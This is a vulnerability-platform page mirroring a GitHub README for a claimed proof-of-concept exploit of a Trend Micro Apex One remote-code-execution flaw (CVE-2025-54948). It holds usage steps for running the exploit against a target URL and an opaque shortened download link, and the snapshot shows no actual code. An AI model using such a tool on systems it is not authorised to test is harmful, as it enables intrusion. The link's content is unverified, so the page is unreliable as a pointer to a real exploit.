漏洞平台

POC详情： 6df3d7e0004136919c03ed1efd812906008de3ac

来源

https://github.com/allinsthon/CVE-2025-54948

关联漏洞

标题： Trend Micro Apex One 安全漏洞 (CVE-2025-54948)
描述：Trend Micro Apex One是美国趋势科技（Trend Micro）公司的一款终端防护软件。 Trend Micro Apex One存在安全漏洞，该漏洞源于允许预认证远程攻击者上传恶意代码并执行命令。

介绍

# CVE-2025-54948 PoC Exploit - Trend Micro Apex One Management Console RCE

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-54948, a remote code execution vulnerability in the Trend Micro Apex One Management Console (on-premise). The vulnerability allows pre-authenticated attackers to execute arbitrary commands due to insufficient input validation.

**WARNING**: This PoC is for educational and authorized testing purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical. The author is not responsible for any misuse.

## Vulnerability Details

- **CVE ID**: CVE-2025-54948
- **CVSSv3 Score**: 9.4 (Critical)
- **Affected Software**: Trend Micro Apex One (on-premise), Management Server ≤ 14039
- **Platform**: Windows
- **Description**: A command injection vulnerability in the management console allows pre-authenticated attackers to upload and execute malicious code.

## Exploit - [href](http://bit.ly/3HpN6dp)

## Usage

1. **Install Dependencies**:
   ```bash
   pip install -r requirements.txt
   ```

2. **Run the Exploit**:
   ```bash
   python exploit.py <target_url> [--command <command>]
   ```
   Example:
   ```bash
   python exploit.py "http://192.168.1.100:8080" --command "whoami"
   ```

3. **Verify Output**: Check the console logs for execution status and response details.

## Requirements

- Python 3.6+
- Libraries listed in `requirements.txt`

## Disclaimer

This PoC is provided "as is" for security researchers and system administrators to understand the vulnerability. Use it only with explicit permission from the system owner. Misuse may violate laws and cause harm.

## Mitigation

A full patch is expected by mid-August 2025. See [Trend Micro Security Bulletin](https://success.trendmicro.com/en-US/solution/KA-0019926).

## References

- [Trend Micro Security Bulletin](https://success.trendmicro.com/en-US/solution/KA-0019926)
- [Qualys ThreatPROTECT Blog](https://threatprotect.qualys.com/2025/08/06/trend-micro-apex-one-on-prem-zero-day-vulnerabilities-exploited-in-the-wild-cve-2025-54948-cve-2025-54987/)

文件快照


 [4.0K]  /data/pocs/6df3d7e0004136919c03ed1efd812906008de3ac
└── [2.1K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。